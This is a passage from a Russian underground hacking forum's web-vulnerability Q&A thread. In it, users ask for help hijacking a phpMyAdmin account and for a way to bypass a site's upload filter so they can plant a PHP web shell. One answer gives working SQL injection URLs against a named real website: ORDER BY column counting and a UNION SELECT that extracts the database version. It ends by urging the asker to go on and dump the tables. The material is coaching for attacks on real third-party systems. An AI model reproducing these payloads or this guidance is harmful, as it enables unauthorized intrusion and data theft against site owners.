Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

[Web-Уязвимости] Вопрос - ответ
Старый 13.05.2007, 13:34   #1
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25

[Web-Уязвимости] Вопрос - ответ

В этой теме вы можете задавать любые вопросы по уязвимостям. Если вы нашли где то уязвимость, и не можете ей воспользоваться - вам сюда. По мере возможностей всё будет объяснено/описано.

Запрещается:
-Просьбы в о взломе (Я могу только помочь раскрутить уязвимость, дальше уже сами)
-Сторонние вопросы (уязвимости сторонних протоколов: ICQ, IRC, WAP etc ; вопросы связанные с ОС и серверами)

Запомните, здесь только web!

Любой оффтоп будет удаляться.

UPD. Размещение ссылок на ресурсы ЗАПРЕЩЕНО, в случае нарушения сообщение будет немедленно удаляться. (с) cat1vo
  Ответить с цитированием

пхп майадмин
Старый 15.10.2013, 02:29   #451
bot
 
Аватар для frediks
 
frediks вне форума
Регистрация: 14.10.2013
Сообщений: 1
Респекты: 0
пхп майадмин

Доброго всем! Умный люд подскажи чем можно свернуть доступ к акку на пхп майадмин?? ну или ссыль какую грамотную киньте, не поверите но надо по самое не балуй,,, Пасиб всем!
  Ответить с цитированием

Старый 20.02.2014, 19:39   #452
kilobyte
 
Аватар для Baleanu
 
Baleanu вне форума
Регистрация: 23.05.2011
Сообщений: 161
Респекты: 143
Здравствуйте.Сразу скажу я новичок в этом деле , короче есть небольшая проблема. Есть сайт на который можно загружать файлы, доступные файлы которые можно загружать написаны в js который прикреплен к сайту
Код:
$('#drop-area').fileupload({
        url: url,
        dataType: 'json',
        autoUpload: true,
        acceptFileTypes: /(\.|\/)(bak|cfg|dat|dmp|doc?x|gif|rar|mp4|jpe?g|png|log|pdf|pp2|replay|txt|wgc|wotreplay|wowpreport|zip|7z|zip|bmp|nfo|php)$/i, // pp2, replay, txt, wgc, wotreplay, wowpreport, zip.
        maxFileSize: 2000000, // 2 MB
        disableImageResize: /Android(?!.*Chrome)|Opera/
            .test(window.navigator.userAgent),
        previewMaxWidth: 100,
        previewMaxHeight: 100,
        previewCrop: true
Сейчас я хочу скачать этот файл поставить себе на localhost , добавить в "acceptFileTypes" еще php чтоб потом можно было шел загрузить,и через hosts изменить путь к файлу js на мой измененный js файл чтоб сайт читал его с localhos'a.
Проблема собственно в том что когда я пишу в hosts сылку на файл http://site.com/js/js.js он добовляет весь сайт,а можно ли как нибудь поменять только путь к этому файлу а не к всему сайту чтоб на http://site.com/js/js.js был мой js файл и чтоб сайт http://site.com/upload/ остался как прежде чтоб собственно можно было загрузить шел .Это я сделал такую теорию. Помогите ее осуществить пожалуйста.
Пс. Я не Русский )
  Ответить с цитированием

Старый 23.02.2014, 11:06   #453
GraBBerZ.CoM
 
Аватар для mironich
 
mironich вне форума
Регистрация: 09.12.2009
Сообщений: 1,792
Респекты: 671
Цитата:
Сообщение от Baleanu Посмотреть сообщение
Здравствуйте.Сразу скажу я новичок в этом деле , короче есть небольшая проблема. Есть сайт на который можно загружать файлы, доступные файлы которые можно загружать написаны в js который прикреплен к сайту
Код:
$('#drop-area').fileupload({
        url: url,
        dataType: 'json',
        autoUpload: true,
        acceptFileTypes: /(\.|\/)(bak|cfg|dat|dmp|doc?x|gif|rar|mp4|jpe?g|png|log|pdf|pp2|replay|txt|wgc|wotreplay|wowpreport|zip|7z|zip|bmp|nfo|php)$/i, // pp2, replay, txt, wgc, wotreplay, wowpreport, zip.
        maxFileSize: 2000000, // 2 MB
        disableImageResize: /Android(?!.*Chrome)|Opera/
            .test(window.navigator.userAgent),
        previewMaxWidth: 100,
        previewMaxHeight: 100,
        previewCrop: true
Сейчас я хочу скачать этот файл поставить себе на localhost , добавить в "acceptFileTypes" еще php чтоб потом можно было шел загрузить,и через hosts изменить путь к файлу js на мой измененный js файл чтоб сайт читал его с localhos'a.
Проблема собственно в том что когда я пишу в hosts сылку на файл http://site.com/js/js.js он добовляет весь сайт,а можно ли как нибудь поменять только путь к этому файлу а не к всему сайту чтоб на http://site.com/js/js.js был мой js файл и чтоб сайт http://site.com/upload/ остался как прежде чтоб собственно можно было загрузить шел .Это я сделал такую теорию. Помогите ее осуществить пожалуйста.
Пс. Я не Русский )
В chrome можно редактировать js прям на сайте, хотя на мой взгляд правильно было бы просто симитировать запрос от сайта, скриптом плагином к броузеру.
__________________
Парсеры,бруты, и другой софт на заказ: icq 688551
PHP код:

$ip mysql_escape_string($_SERVER['REMOTE_ADDR']); 

  Ответить с цитированием
Юзеру mironich выразили Респект за этот пост:

Старый 14.04.2014, 16:48   #454
bit
 
Аватар для Knock!
 
Knock! вне форума
Регистрация: 13.04.2014
Сообщений: 5
Респекты: 0
Привет!Хотел задать пару вопросов про укол в мускул.
Цитата:
http://belgamid.ru/catalogs/catalog.php?id=-21 union select version() --
Так вот,куда здесь выводится?
На что тут ругается?Вроде бы кол-во столбцов правильно подобрал.
Присутствует ли слепая скуль?
P.s.я новичек в этом деле
  Ответить с цитированием

Старый 14.04.2014, 21:41   #455
пездюк
 
Аватар для faza02
 
faza02 вне форума
Регистрация: 24.03.2008
Сообщений: 2,303
Респекты: 3,521
Knock!, неверно. подбираешь конструкцией ORDER BY (перечитай статью еще раз и я бы советовал глянуть видео)
Код:
http://belgamid.ru/catalogs/catalog.php?id=21+order+by+13+--+
ошибка
Код:
http://belgamid.ru/catalogs/catalog.php?id=21+order+by+12+--+
нормально. вывод: 12 столбцов

выводим версию (в самом низу страницы):
Код:
http://belgamid.ru/catalogs/catalog.php?id=21+union+select+1,2,3,4,5,6,version(),8,9,10,11,12+--+
отлично, пятая, можем просмотреть таблицы. дальше попробуй сам
__________________
  Ответить с цитированием

Старый 15.04.2014, 03:54   #456
bit
 
Аватар для Knock!
 
Knock! вне форума
Регистрация: 13.04.2014
Сообщений: 5
Респекты: 0
Спасибо! Очень помог. Буду учится
  Ответить с цитированием
Ответ

Метки
csrf, faq, hackbar, sql, sql injection, xss, вопрос-ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 17:10



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot